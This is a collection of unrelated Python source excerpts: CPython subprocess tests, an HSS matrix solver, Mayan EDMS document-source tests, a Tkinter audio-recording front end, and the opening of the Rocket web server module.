with mock.patch.object(subprocess.Popen, "_wait") as mock__wait:
# We patch out _wait() as no signal was involved so the
# child process isn't actually going to exit rapidly.
mock__wait.side_effect = KeyboardInterrupt
with mock.patch.object(subprocess, "Popen",
self.RecordingPopen):
with self.assertRaises(KeyboardInterrupt):
popener([sys.executable, "-c",
"import time\ntime.sleep(9)\nimport sys\n"
"sys.stderr.write('\\n!runaway child!\\n')"],
stdout=subprocess.DEVNULL, **kwargs)
for call in mock__wait.call_args_list[1:]:
self.assertNotEqual(
call, mock.call(timeout=None),
"no open-ended wait() after the first allowed: "
f"{mock__wait.call_args_list}")
sigint_calls = []
for call in mock__wait.call_args_list:
if call == mock.call(timeout=0.25): # from Popen.__init__
sigint_calls.append(call)
self.assertLessEqual(mock__wait.call_count, 2,
msg=mock__wait.call_args_list)
self.assertEqual(len(sigint_calls), 1,
msg=mock__wait.call_args_list)
finally:
# cleanup the forgotten (due to our mocks) child process
process = self.RecordingPopen.instances_created.pop()
process.kill()
process.wait()
self.assertEqual([], self.RecordingPopen.instances_created)
def test_call_keyboardinterrupt_no_kill(self):
self._test_keyboardinterrupt_no_kill(subprocess.call, timeout=6.282)
def test_run_keyboardinterrupt_no_kill(self):
self._test_keyboardinterrupt_no_kill(subprocess.run, timeout=6.282)
def test_context_manager_keyboardinterrupt_no_kill(self):
def popen_via_context_manager(*args, **kwargs):
with subprocess.Popen(*args, **kwargs) as unused_process:
raise KeyboardInterrupt # Test how __exit__ handles ^C.
self._test_keyboardinterrupt_no_kill(popen_via_context_manager)
def test_getoutput(self):
self.assertEqual(subprocess.getoutput('echo xyzzy'), 'xyzzy')
self.assertEqual(subprocess.getstatusoutput('echo xyzzy'),
(0, 'xyzzy'))
# we use mkdtemp in the next line to create an empty directory
# under our exclusive control; from that, we can invent a pathname
# that we _know_ won't exist. This is guaranteed to fail.
dir = None
try:
dir = tempfile.mkdtemp()
name = os.path.join(dir, "foo")
status, output = subprocess.getstatusoutput(
("type " if mswindows else "cat ") + name)
self.assertNotEqual(status, 0)
finally:
if dir is not None:
os.rmdir(dir)
def test__all__(self):
"""Ensure that __all__ is populated properly."""
intentionally_excluded = {"list2cmdline", "Handle", "pwd", "grp", "fcntl"}
exported = set(subprocess.__all__)
possible_exports = set()
import types
for name, value in subprocess.__dict__.items():
if name.startswith('_'):
continue
if isinstance(value, (types.ModuleType,)):
continue
possible_exports.add(name)
self.assertEqual(exported, possible_exports - intentionally_excluded)
@unittest.skipUnless(hasattr(selectors, 'PollSelector'),
"Test needs selectors.PollSelector")
class ProcessTestCaseNoPoll(ProcessTestCase):
def setUp(self):
self.orig_selector = subprocess._PopenSelector
subprocess._PopenSelector = selectors.SelectSelector
ProcessTestCase.setUp(self)
def tearDown(self):
subprocess._PopenSelector = self.orig_selector
ProcessTestCase.tearDown(self)
@unittest.skipUnless(mswindows, "Windows-specific tests")
class CommandsWithSpaces (BaseTestCase):
def setUp(self):
super().setUp()
f, fname = tempfile.mkstemp(".py", "te st")
self.fname = fname.lower ()
os.write(f, b"import sys;"
b"sys.stdout.write('%d %s' % (len(sys.argv), [a.lower () for a in sys.argv]))"
)
os.close(f)
def tearDown(self):
os.remove(self.fname)
super().tearDown()
def with_spaces(self, *args, **kwargs):
kwargs['stdout'] = subprocess.PIPE
p = subprocess.Popen(*args, **kwargs)
with p:
self.assertEqual(
p.stdout.read ().decode("mbcs"),
"2 [%r, 'ab cd']" % self.fname
)
def test_shell_string_with_spaces(self):
# call() function with string argument with spaces on Windows
self.with_spaces('"%s" "%s" "%s"' % (sys.executable, self.fname,
"ab cd"), shell=1)
def test_shell_sequence_with_spaces(self):
# call() function with sequence argument with spaces on Windows
self.with_spaces([sys.executable, self.fname, "ab cd"], shell=1)
def test_noshell_string_with_spaces(self):
# call() function with string argument with spaces on Windows
self.with_spaces('"%s" "%s" "%s"' % (sys.executable, self.fname,
"ab cd"))
def test_noshell_sequence_with_spaces(self):
# call() function with sequence argument with spaces on Windows
self.with_spaces([sys.executable, self.fname, "ab cd"])
class ContextManagerTests(BaseTestCase):
def test_pipe(self):
with subprocess.Popen([sys.executable, "-c",
"import sys;"
"sys.stdout.write('stdout');"
"sys.stderr.write('stderr');"],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as proc:
self.assertEqual(proc.stdout.read(), b"stdout")
self.assertEqual(proc.stderr.read(), b"stderr")
self.assertTrue(proc.stdout.closed)
self.assertTrue(proc.stderr.closed)
def test_returncode(self):
with subprocess.Popen([sys.executable, "-c",
"import sys; sys.exit(100)"]) as proc:
pass
# __exit__ calls wait(), so the returncode should be set
self.assertEqual(proc.returncode, 100)
def test_communicate_stdin(self):
with subprocess.Popen([sys.executable, "-c",
"import sys;"
"sys.exit(sys.stdin.read() == 'context')"],
stdin=subprocess.PIPE) as proc:
proc.communicate(b"context")
self.assertEqual(proc.returncode, 1)
def test_invalid_args(self):
with self.assertRaises(NONEXISTING_ERRORS):
with subprocess.Popen(NONEXISTING_CMD,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as proc:
pass
def test_broken_pipe_cleanup(self):
"""Broken pipe error should not prevent wait() (Issue 21619)"""
proc = subprocess.Popen(ZERO_RETURN_CMD,
stdin=subprocess.PIPE,
bufsize=support.PIPE_MAX_SIZE*2)
proc = proc.__enter__()
# Prepare to send enough data to overflow any OS pipe buffering and
# guarantee a broken pipe error. Data is held in BufferedWriter
# buffer until closed.
proc.stdin.write(b'x' * support.PIPE_MAX_SIZE)
self.assertIsNone(proc.returncode)
# EPIPE expected under POSIX; EINVAL under Windows
self.assertRaises(OSError, proc.__exit__, None, None, None)
self.assertEqual(proc.returncode, 0)
self.assertTrue(proc.stdin.closed)
if __name__ == "__main__":
unittest.main()
# ===== fast_solver_utils.py =====
import gauss
import log
import tools
import numpy as np
import functools
import operator
from multiprocessing import SimpleQueue, Process
__all__ = ['solve']
def func(i, obj, b_i, A, q):
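"""Reduce one leaf block of the HSS system in a worker process.
(Added summary, inferred from the code below.) If the block's U factor is
tall (more rows than columns), compress it with a QL factorization,
eliminate the compressible part of the right-hand side b_i by Gaussian
elimination, and LQ-factorize the transformed diagonal block; otherwise
return the block unchanged with identity transforms. The result is put on
the multiprocessing queue q, keyed by block index i."""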
if obj.U.shape[0] > obj.U.shape[1]:
q_i, tmpU = tools.ql(obj.get_U())
n_i = tmpU.shape[1]
new_U = tools.get_block(tmpU, [i for i in range(tmpU.shape[1] - n_i, tmpU.shape[1])],
[j for j in range(n_i)])
s = np.array(b_i).reshape((len(b_i), 1))
c = np.transpose(q_i)
t = c @ s
beta = t[:len(t) - n_i]
#gamma = t[len(t) - n_i:]
t = np.transpose(q_i) @ obj.get_D(A)
tmpD, w_i = tools.lq(t)
new_D = tools.get_block(tmpD, [i for i in range(tmpD.shape[0] - n_i, tmpD.shape[0])],
[j for j in range(tmpD.shape[0] - n_i, tmpD.shape[0])])
tmpV = w_i @ obj.get_V()
new_V = tools.get_block(tmpV, [i for i in range(tmpV.shape[0] - n_i, tmpD.shape[0])],
[j for j in range(tmpV.shape[1])])
o = tools.get_block(tmpD, [i for i in range(tmpD.shape[0] - n_i)],
[j for j in range(tmpD.shape[0] - n_i)])
z_i = gauss.gauss(o, beta)
z_i = list(z_i)
else:
if log.is_debug():
log.debug('incompressible rows')
tmpD = obj.get_D(A)
tmpU = obj.get_U()
tmpV = obj.get_V()
new_D = obj.get_D(A)
new_U = obj.get_U()
new_V = obj.get_V()
n_i = obj.get_U().shape[0]
z_i = []
q_i = np.identity(obj.get_D(A).shape[0])
w_i = np.identity(obj.get_D(A).shape[1])
res = [tmpD, tmpU, tmpV, new_D, new_U, new_V, (z_i, n_i), np.transpose(q_i), np.transpose(w_i)]
q.put((i, res))
def batch_func(args):
for arg in args:
func(*arg)
def solve(hss, b, processes_count=1):
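"""Solve hss @ x = b by level-by-level HSS reduction.
(Added summary, inferred from the code.) At the deepest level every
compressible block is reduced in a worker process via func(); the reduced
problem is solved recursively on a duplicate of the HSS tree with its last
level removed, and the partial solutions are mapped back through the
accumulated orthogonal factors with tools.diag(w_is)."""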
if hss.Partition.max_level == 1:
assert len(hss.Partition.level_to_nodes[1]) == 1
tmp = hss.Partition.level_to_nodes[1][0].get_D(hss.A)
b = np.array(b).reshape((len(b), 1))
return gauss.gauss(tmp, b)
no_compressible_blocks = all([obj.U.shape[0] <= obj.U.shape[1] for obj in hss.Partition.level_to_nodes[hss.Partition.max_level]])
if no_compressible_blocks:
if log.is_debug():
log.debug('No compressible blocks')
tmp = hss.duplicate()
tmp.remove_last_level()
s = b
return solve(tmp, s)
else:
if log.is_debug():
log.debug('Compressible blocks')
res = {}
queue = SimpleQueue()
start_index = 0
args = {}
tasks_count = len(hss.Partition.level_to_nodes[hss.Partition.max_level])
for k in range(0, tasks_count):
index = k % processes_count
obj = hss.Partition.level_to_nodes[hss.Partition.max_level][k]
b_i = b[start_index:start_index + obj.U.shape[0]]
start_index += obj.U.shape[0]
args[index] = args.get(index, []) + [(k, obj, b_i, hss.A, queue)]
processes = []
for key in args.keys():
p = Process(target=batch_func, args=(args[key],))
p.daemon = True
p.start()
processes.append(p)
for _ in range(tasks_count):
pair = queue.get()
res[pair[0]] = pair[1]
tmpDs = [res[i][0] for i in range(0, tasks_count)]
tmpUs = [res[i][1] for i in range(0, tasks_count)]
tmpVs = [res[i][2] for i in range(0, tasks_count)]
newDs = [res[i][3] for i in range(0, tasks_count)]
newUs = [res[i][4] for i in range(0, tasks_count)]
newVs = [res[i][5] for i in range(0, tasks_count)]
z = [res[i][6] for i in range(0, tasks_count)]
q_is = [res[i][7] for i in range(0, tasks_count)]
w_is = [res[i][8] for i in range(0, tasks_count)]
tmp_HSS = hss.duplicate()
tmp_HSS.set_last_level_matrices(tmpUs, tmpVs, tmpDs)
z_zeroed = functools.reduce(operator.add, [list(z_[0]) + [0] * z_[1] for z_ in z])
z_zeroed = np.array(z_zeroed).reshape(len(z_zeroed), 1)
b = np.array(b).reshape((len(b), 1))
b_unitary = tools.diag(q_is) @ b
assert len(z_zeroed) == len(b)
b_tmp = tmp_HSS.fast_multiply(z_zeroed, processes_count=processes_count)
b_tmp = b_tmp.reshape((b_tmp.shape[0], 1))
b_ = b_unitary - b_tmp
new_b = []
i = 0
for obj in z:
i += len(obj[0])
j = 0
while j < obj[1]:
new_b.append([b_[i]])
i += 1
j += 1
new_HSS = hss.duplicate()
new_HSS.set_last_level_matrices(newUs, newVs, newDs)
tmp_x = solve(new_HSS, new_b)
i = 0
tmp3 = []
for z_ in z:
tmp3 += list(z_[0]) + list(tmp_x[i:i + z_[1]])
i += z_[1]
return tools.diag(w_is) @ tmp3
# ===== test_models.py =====
import fcntl
from multiprocessing import Process
from pathlib import Path
import shutil
import mock
from django.core import mail
from django.utils.encoding import force_bytes, force_text
from django_celery_beat.models import PeriodicTask
from mayan.apps.common.serialization import yaml_dump
from mayan.apps.documents.models import Document
from mayan.apps.documents.storages import storage_document_versions
from mayan.apps.documents.tests.base import GenericDocumentTestCase
from mayan.apps.documents.tests.literals import (
TEST_COMPRESSED_DOCUMENT_PATH, TEST_NON_ASCII_DOCUMENT_FILENAME,
TEST_NON_ASCII_DOCUMENT_PATH, TEST_NON_ASCII_COMPRESSED_DOCUMENT_PATH,
TEST_SMALL_DOCUMENT_FILENAME, TEST_SMALL_DOCUMENT_PATH
)
from mayan.apps.metadata.models import MetadataType
from ..literals import SOURCE_UNCOMPRESS_CHOICE_Y
from ..models.email_sources import EmailBaseModel, IMAPEmail, POP3Email
from ..models.scanner_sources import SaneScanner
from .literals import (
TEST_EMAIL_ATTACHMENT_AND_INLINE, TEST_EMAIL_BASE64_FILENAME,
TEST_EMAIL_BASE64_FILENAME_FROM, TEST_EMAIL_BASE64_FILENAME_SUBJECT,
TEST_EMAIL_INLINE_IMAGE, TEST_EMAIL_NO_CONTENT_TYPE,
TEST_EMAIL_NO_CONTENT_TYPE_STRING, TEST_EMAIL_ZERO_LENGTH_ATTACHMENT,
TEST_WATCHFOLDER_SUBFOLDER
)
from .mixins import SourceTestMixin, WatchFolderTestMixin
from .mocks import MockIMAPServer, MockPOP3Mailbox
class CompressedUploadsTestCase(SourceTestMixin, GenericDocumentTestCase):
auto_upload_test_document = False
def test_upload_compressed_file(self):
self.test_source.uncompress = SOURCE_UNCOMPRESS_CHOICE_Y
self.test_source.save()
with open(file=TEST_COMPRESSED_DOCUMENT_PATH, mode='rb') as file_object:
self.test_source.handle_upload(
document_type=self.test_document_type,
file_object=file_object,
expand=(
self.test_source.uncompress == SOURCE_UNCOMPRESS_CHOICE_Y
)
)
self.assertEqual(Document.objects.count(), 2)
self.assertTrue(
'first document.pdf' in Document.objects.values_list(
'label', flat=True
)
)
self.assertTrue(
'second document.pdf' in Document.objects.values_list(
'label', flat=True
)
)
class EmailBaseTestCase(GenericDocumentTestCase):
auto_upload_test_document = False
def _create_email_source(self):
self.source = EmailBaseModel(
document_type=self.test_document_type,
host='', username='', password='', store_body=True
)
def test_decode_email_base64_encoded_filename(self):
"""
Test decoding of base64 encoded e-mail attachment filename.
"""
self._create_email_source()
EmailBaseModel.process_message(
source=self.source, message_text=TEST_EMAIL_BASE64_FILENAME
)
self.assertEqual(
Document.objects.first().label, 'Ampelm\xe4nnchen.txt'
)
def test_decode_email_no_content_type(self):
self._create_email_source()
EmailBaseModel.process_message(
source=self.source, message_text=TEST_EMAIL_NO_CONTENT_TYPE
)
self.assertTrue(
TEST_EMAIL_NO_CONTENT_TYPE_STRING in Document.objects.first().open().read()
)
def test_decode_email_zero_length_attachment(self):
self._create_email_source()
self.source.store_body = False
self.source.save()
EmailBaseModel.process_message(
source=self.source, message_text=TEST_EMAIL_ZERO_LENGTH_ATTACHMENT
)
self.assertEqual(Document.objects.count(), 0)
def test_decode_email_with_inline_image(self):
# Silence expected errors in other apps
self._silence_logger(name='mayan.apps.converter.backends')
self._create_email_source()
EmailBaseModel.process_message(
source=self.source, message_text=TEST_EMAIL_INLINE_IMAGE
)
self.assertEqual(Document.objects.count(), 2)
self.assertQuerysetEqual(
ordered=False, qs=Document.objects.all(), values=(
'<Document: test-01.png>', '<Document: email_body.html>'
),
)
def test_decode_email_with_attachment_and_inline_image(self):
# Silence expected errors in other apps
self._silence_logger(name='mayan.apps.converter.backends')
self._create_email_source()
EmailBaseModel.process_message(
source=self.source, message_text=TEST_EMAIL_ATTACHMENT_AND_INLINE
)
self.assertEqual(Document.objects.count(), 2)
self.assertQuerysetEqual(
ordered=False, qs=Document.objects.all(), values=(
'<Document: test-01.png>', '<Document: email_body.html>',
),
)
def test_decode_email_and_store_from_and_subject_as_metadata(self):
metadata_from = MetadataType.objects.create(name='from')
metadata_subject = MetadataType.objects.create(name='subject')
self.test_document_type.metadata.create(metadata_type=metadata_from)
self.test_document_type.metadata.create(metadata_type=metadata_subject)
self._create_email_source()
self.source.from_metadata_type = metadata_from
self.source.subject_metadata_type = metadata_subject
self.source.save()
EmailBaseModel.process_message(
source=self.source, message_text=TEST_EMAIL_BASE64_FILENAME
)
document = Document.objects.first()
self.assertEqual(
document.label, 'Ampelm\xe4nnchen.txt'
)
self.assertEqual(
document.metadata.get(metadata_type=metadata_from).value,
TEST_EMAIL_BASE64_FILENAME_FROM
)
self.assertEqual(
document.metadata.get(metadata_type=metadata_subject).value,
TEST_EMAIL_BASE64_FILENAME_SUBJECT
)
def test_document_upload_no_body(self):
# Silence expected errors in other apps
self._silence_logger(name='mayan.apps.converter.backends')
self._create_email_source()
self.source.store_body = False
self.source.save()
EmailBaseModel.process_message(
source=self.source, message_text=TEST_EMAIL_ATTACHMENT_AND_INLINE
)
# Only the attachment, no body document
self.assertEqual(1, Document.objects.count())
def test_document_upload_with_body(self):
# Silence expected errors in other apps
self._silence_logger(name='mayan.apps.converter.backends')
self._create_email_source()
EmailBaseModel.process_message(
source=self.source, message_text=TEST_EMAIL_ATTACHMENT_AND_INLINE
)
# The attachment plus the body document
self.assertEqual(2, Document.objects.count())
def test_metadata_yaml_attachment(self):
TEST_METADATA_VALUE_1 = 'test value 1'
TEST_METADATA_VALUE_2 = 'test value 2'
test_metadata_type_1 = MetadataType.objects.create(
name='test_metadata_type_1'
)
test_metadata_type_2 = MetadataType.objects.create(
name='test_metadata_type_2'
)
self.test_document_type.metadata.create(
metadata_type=test_metadata_type_1
)
self.test_document_type.metadata.create(
metadata_type=test_metadata_type_2
)
test_metadata_yaml = yaml_dump(
data={
test_metadata_type_1.name: TEST_METADATA_VALUE_1,
test_metadata_type_2.name: TEST_METADATA_VALUE_2,
}
)
# Create email with a test attachment first, then the metadata.yaml
# attachment
with mail.get_connection(
backend='django.core.mail.backends.locmem.EmailBackend'
) as connection:
email_message = mail.EmailMultiAlternatives(
body='test email body', connection=connection,
subject='test email subject', to=['test@example.com'],
)
email_message.attach(
filename='test_attachment',
content='test_content',
)
email_message.attach(
filename='metadata.yaml',
content=test_metadata_yaml,
)
email_message.send()
self._create_email_source()
self.source.store_body = True
self.source.save()
EmailBaseModel.process_message(
source=self.source, message_text=mail.outbox[0].message()
)
self.assertEqual(Document.objects.count(), 2)
for document in Document.objects.all():
self.assertEqual(
document.metadata.get(metadata_type=test_metadata_type_1).value,
TEST_METADATA_VALUE_1
)
self.assertEqual(
document.metadata.get(metadata_type=test_metadata_type_2).value,
TEST_METADATA_VALUE_2
)
class IMAPSourceTestCase(GenericDocumentTestCase):
auto_upload_test_document = False
@mock.patch('imaplib.IMAP4_SSL', autospec=True)
def test_download_document(self, mock_imaplib):
mock_imaplib.return_value = MockIMAPServer()
self.source = IMAPEmail.objects.create(
document_type=self.test_document_type, label='', host='',
password='', username=''
)
self.source.check_source()
self.assertEqual(
Document.objects.first().label, 'Ampelm\xe4nnchen.txt'
)
class IntervalSourceTestCase(WatchFolderTestMixin, GenericDocumentTestCase):
auto_upload_test_document = False
def test_periodic_task_create(self):
periodic_task_count = PeriodicTask.objects.count()
self._create_test_watchfolder()
self.assertTrue(PeriodicTask.objects.count() > periodic_task_count)
def test_periodic_task_delete(self):
self._create_test_watchfolder()
periodic_task_count = PeriodicTask.objects.count()
self.test_document_type.delete()
self.assertTrue(PeriodicTask.objects.count() < periodic_task_count)
class POP3SourceTestCase(GenericDocumentTestCase):
auto_upload_test_document = False
@mock.patch('poplib.POP3_SSL', autospec=True)
def test_download_document(self, mock_poplib):
mock_poplib.return_value = MockPOP3Mailbox()
self.source = POP3Email.objects.create(
document_type=self.test_document_type, label='', host='',
password='', username=''
)
self.source.check_source()
self.assertEqual(
Document.objects.first().label, 'Ampelm\xe4nnchen.txt'
)
class SANESourceTestCase(GenericDocumentTestCase):
auto_upload_test_document = False
def _create_test_scanner_source(self):
self.test_source = SaneScanner.objects.create(
label='', device_name='test'
)
def test_command(self):
self._create_test_scanner_source()
file_object = self.test_source.execute_command(arguments=('-V',))
self.assertTrue(force_bytes('sane') in file_object.read())
def test_scan(self):
self._create_test_scanner_source()
file_object = self.test_source.get_upload_file_object(
form_data={'document_type': self.test_document_type.pk}
)
self.assertTrue(file_object.size > 0)
class WatchFolderTestCase(WatchFolderTestMixin, GenericDocumentTestCase):
auto_upload_test_document = False
def test_subfolder_support_disabled(self):
self._create_test_watchfolder()
test_path = Path(self.temporary_directory)
test_subfolder = test_path.joinpath(TEST_WATCHFOLDER_SUBFOLDER)
test_subfolder.mkdir()
shutil.copy(
src=TEST_SMALL_DOCUMENT_PATH, dst=force_text(s=test_subfolder)
)
self.test_watch_folder.check_source()
self.assertEqual(Document.objects.count(), 0)
def test_subfolder_support_enabled(self):
self._create_test_watchfolder()
self.test_watch_folder.include_subdirectories = True
self.test_watch_folder.save()
test_path = Path(self.temporary_directory)
test_subfolder = test_path.joinpath(TEST_WATCHFOLDER_SUBFOLDER)
test_subfolder.mkdir()
shutil.copy(
src=TEST_SMALL_DOCUMENT_PATH, dst=force_text(s=test_subfolder)
)
self.test_watch_folder.check_source()
self.assertEqual(Document.objects.count(), 1)
document = Document.objects.first()
self.assertEqual(document.exists(), True)
self.assertEqual(document.size, 17436)
self.assertEqual(document.file_mimetype, 'image/png')
self.assertEqual(document.file_mime_encoding, 'binary')
self.assertEqual(document.label, TEST_SMALL_DOCUMENT_FILENAME)
self.assertEqual(document.page_count, 1)
def test_issue_gh_163(self):
"""
Non-ASCII chars in document name failing in upload via watch folder
gh-issue #163 https://github.com/mayan-edms/mayan-edms/issues/163
"""
self._create_test_watchfolder()
shutil.copy(
src=TEST_NON_ASCII_DOCUMENT_PATH, dst=self.temporary_directory
)
self.test_watch_folder.check_source()
self.assertEqual(Document.objects.count(), 1)
document = Document.objects.first()
self.assertEqual(document.exists(), True)
self.assertEqual(document.size, 17436)
self.assertEqual(document.file_mimetype, 'image/png')
self.assertEqual(document.file_mime_encoding, 'binary')
self.assertEqual(document.label, TEST_NON_ASCII_DOCUMENT_FILENAME)
self.assertEqual(document.page_count, 1)
def test_issue_gh_163_expanded(self):
"""
Test Non-ASCII named documents inside Non-ASCII named compressed file
"""
self._create_test_watchfolder()
shutil.copy(
src=TEST_NON_ASCII_COMPRESSED_DOCUMENT_PATH,
dst=self.temporary_directory
)
self.test_watch_folder.check_source()
self.assertEqual(Document.objects.count(), 1)
document = Document.objects.first()
self.assertEqual(document.exists(), True)
self.assertEqual(document.size, 17436)
self.assertEqual(document.file_mimetype, 'image/png')
self.assertEqual(document.file_mime_encoding, 'binary')
self.assertEqual(document.label, TEST_NON_ASCII_DOCUMENT_FILENAME)
self.assertEqual(document.page_count, 1)
def test_locking_support(self):
self._create_test_watchfolder()
shutil.copy(
src=TEST_SMALL_DOCUMENT_PATH, dst=self.temporary_directory
)
path_test_file = Path(
self.temporary_directory, TEST_SMALL_DOCUMENT_FILENAME
)
with path_test_file.open(mode='rb+') as file_object:
fcntl.lockf(file_object, fcntl.LOCK_EX | fcntl.LOCK_NB)
process = Process(target=self.test_watch_folder.check_source)
process.start()
process.join()
self.assertEqual(Document.objects.count(), 0)
class SourceModelTestCase(SourceTestMixin, GenericDocumentTestCase):
auto_upload_test_document = False
def setUp(self):
super().setUp()
self.document_version_storage_instance = storage_document_versions.get_storage_instance()
def _get_document_version_storage_file_count(self):
return len(
self.document_version_storage_instance.listdir(path='')[1]
)
def test_single_storage_file_creation(self):
document_version_file_count = self._get_document_version_storage_file_count()
with open(TEST_SMALL_DOCUMENT_PATH, mode='rb') as file_object:
self.test_source.handle_upload(
file_object=file_object,
document_type=self.test_document_type
)
self.assertEqual(
self._get_document_version_storage_file_count(),
document_version_file_count + 1
)
# ===== main.py =====
from Tkinter import *
from threading import Thread
from record import record_to_file
from features import mfcc
from anntester_single import *
import scipy.io.wavfile as wav
class Application(Frame):
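"""Tkinter front end: a record button plus a one-line status box.
(Added summary, inferred from the code.) Recording and classification run
in a separate thread started by record_buttonpress so the GUI stays
responsive while audio is captured and fed to the network."""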
def createWidgets(self):
self.button_image = PhotoImage(file="button.gif")
self.RECORD = Button(self, image=self.button_image, width="100", height="100", command=self.record_buttonpress)
self.RECORD.pack()
self.TEXTBOX = Text(self, height="1", width="30")
self.TEXTBOX.pack()
def __init__(self, master=None):
Frame.__init__(self, master)
self.pack()
self.createWidgets()
self.TEXTBOX.insert(INSERT, "Press to record")
self.TEXTBOX.tag_config("recording", foreground="red", justify="center")
self.TEXTBOX.tag_config("success", foreground="darkgreen", justify="center")
self.TEXTBOX.configure(state="disabled")
def record_buttonpress(self):
recorder_thread = Thread(target=record_and_test, args=(self.TEXTBOX, self.RECORD))
recorder_thread.start()
def record_and_test(textbox, button, filename="test_files/test.wav"):
# Disable button and change text
button.configure(state="disabled")
textbox.configure(state="normal")
textbox.delete("1.0", END)
textbox.insert(INSERT, "Recording")
textbox.tag_add("recording", "1.0", END)
textbox.configure(state="disabled")
# Record to file
record_to_file(filename)
# Feed into ANN
testNet = testInit()
inputArray = extractFeature(filename)
print len(inputArray)
outStr = feedToNetwork(inputArray,testNet)
# Change text and re-enable button
textbox.configure(state="normal")
textbox.delete("1.0", END)
textbox.tag_remove("recording", "1.0")
textbox.insert(INSERT, outStr)
textbox.tag_add("success", "1.0", END)
textbox.configure(state="disabled")
button.configure(state="normal")
if __name__ == '__main__':
# Display GUI
root = Tk()
app = Application(master=root)
app.mainloop()
#root.destroy()
# ===== rocket.py =====
# -*- coding: utf-8 -*-
# This file is part of the Rocket Web Server
# Copyright (c) 2011 Timothy Farrell
# Modified by Massimo Di Pierro
# Import System Modules
import sys
import errno
import socket
import logging
import platform
# Define Constants
VERSION = '1.2.6'
SERVER_NAME = socket.gethostname()
SERVER_SOFTWARE = 'Rocket %s' % VERSION
HTTP_SERVER_SOFTWARE = '%s Python/%s' % (
SERVER_SOFTWARE, sys.version.split(' ')[0])
BUF_SIZE = 16384
SOCKET_TIMEOUT = 10 # in secs
THREAD_STOP_CHECK_INTERVAL = 1 # in secs, How often should threads check for a server stop message?
IS_JYTHON = platform.system() == 'Java' # Handle special cases for Jython
IGNORE_ERRORS_ON_CLOSE = set([errno.ECONNABORTED, errno.ECONNRESET])
DEFAULT_LISTEN_QUEUE_SIZE = 5
DEFAULT_MIN_THREADS = 10
DEFAULT_MAX_THREADS = 0
DEFAULTS = dict(LISTEN_QUEUE_SIZE=DEFAULT_LISTEN_QUEUE_SIZE,
MIN_THREADS=DEFAULT_MIN_THREADS,
MAX_THREADS=DEFAULT_MAX_THREADS)
PY3K = sys.version_info[0] > 2
class NullHandler(logging.Handler):
"A Logging handler to prevent library errors."
def emit(self, record):
pass
if PY3K:
def b(val):
""" Convert string/unicode/bytes literals into bytes. This allows for
the same code to run on Python 2.x and 3.x. """
if isinstance(val, str):
return val.encode()
else:
return val
def u(val, encoding="us-ascii"):
""" Convert bytes into string/unicode. This allows for the
same code to run on Python 2.x and 3.x. """
if isinstance(val, bytes):
return val.decode(encoding)
else:
return val
else:
def b(val):
""" Convert string/unicode/bytes literals into bytes. This allows for
the same code to run on Python 2.x and 3.x. """
if isinstance(val, unicode):
return val.encode()
else:
return val
def u(val, encoding="us-ascii"):
""" Convert bytes into string/unicode. This allows for the
same code to run on Python 2.x and 3.x. """
if isinstance(val, str):
return val.decode(encoding)
else:
return val
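# Illustrative round trip for the helpers above (comment added; values are
# examples, not part of the original module):
#   b('abc')  -> b'abc' on Python 3, 'abc' (a byte string) on Python 2
#   u(b'abc') -> 'abc', decoded as us-ascii unless an encoding is passed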
# Import Package Modules
# package imports removed in monolithic build
__all__ = ['VERSION', 'SERVER_SOFTWARE', 'HTTP_SERVER_SOFTWARE', 'BUF_SIZE',
'IS_JYTHON', 'IGNORE_ERRORS_ON_CLOSE', 'DEFAULTS', 'PY3K', 'b', 'u',
'Rocket', 'CherryPyWSGIServer', 'SERVER_NAME', 'NullHandler']
# Monolithic build...end of module: rocket/__init__.py
# Monolithic build...start of module: rocket/connection.py
# Import System Modules
import sys
import time
import socket
try:
import ssl
has_ssl = True
except ImportError:
has_ssl = False
# Import Package Modules
# package imports removed in monolithic build
# TODO - This part is still very experimental.
#from .filelike import FileLikeSocket
class Connection(object):
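"""Lightweight wrapper around an accepted socket.
(Added summary, inferred from the code.) It records the client address,
port and start time, applies the module-wide SOCKET_TIMEOUT, and re-binds
the common socket methods (recv, send, sendall, makefile, ...) listed in
__slots__ so workers can treat a Connection like the socket itself."""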
__slots__ = [
'setblocking',
'sendall',
'shutdown',
'makefile',
'fileno',
'client_addr',
'client_port',
'server_port',
'socket',
'start_time',
'ssl',
'secure',
'recv',
'send',
'read',
'write'
]
def __init__(self, sock_tuple, port, secure=False):
self.client_addr, self.client_port = sock_tuple[1][:2]
self.server_port = port
self.socket = sock_tuple[0]
self.start_time = time.time()
self.ssl = has_ssl and isinstance(self.socket, ssl.SSLSocket)
self.secure = secure
if IS_JYTHON:
# In Jython we must set TCP_NODELAY here since it does not
# inherit from the listening socket.
# See: http://bugs.jython.org/issue1309
self.socket.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
self.socket.settimeout(SOCKET_TIMEOUT)
self.shutdown = self.socket.shutdown
self.fileno = self.socket.fileno
self.setblocking = self.socket.setblocking
self.recv = self.socket.recv
self.send = self.socket.send
self.makefile = self.socket.makefile
if sys.platform == 'darwin':
self.sendall = self._sendall_darwin
else:
self.sendall = self.socket.sendall
def _sendall_darwin(self, buf):
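"""Emulated sendall() for macOS. (Added docstring; behavior inferred
from the code.) send() may fail part-way through with EAGAIN on Darwin,
so the buffer is written in a retry loop and any other socket error is
re-raised."""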
pending = len(buf)
offset = 0
while pending:
try:
sent = self.socket.send(buf[offset:])
pending -= sent
offset += sent
except socket.error:
import errno
info = sys.exc_info()
if info[1].args[0] != errno.EAGAIN:
raise
return offset
# FIXME - this is not ready for prime-time yet.
# def makefile(self, buf_size=BUF_SIZE):
# return FileLikeSocket(self, buf_size)
def close(self):
if hasattr(self.socket, '_sock'):
try:
self.socket._sock.close()
except socket.error:
info = sys.exc_info()
if info[1].args[0] != socket.EBADF:
raise info[1]
else:
pass
self.socket.close()
# Monolithic build...end of module: rocket/connection.py
# Monolithic build...start of module: rocket/filelike.py
# Import System Modules
import socket
try:
from io import StringIO
except ImportError:
try:
from cStringIO import StringIO
except ImportError:
from StringIO import StringIO
# Import Package Modules
# package imports removed in monolithic build
class FileLikeSocket(object):
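"""File-like view over a Connection. (Added summary, inferred from the
code; the surrounding comments mark this part as experimental.) read()
is bound to a blocking or non-blocking implementation depending on the
socket timeout, partial data is staged in a StringIO buffer, and
readline()/readlines() provide line-oriented iteration."""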
def __init__(self, conn, buf_size=BUF_SIZE):
self.conn = conn
self.buf_size = buf_size
self.buffer = StringIO()
self.content_length = None
if self.conn.socket.gettimeout() == 0.0:
self.read = self.non_blocking_read
else:
self.read = self.blocking_read
def __iter__(self):
return self
def recv(self, size):
while True:
try:
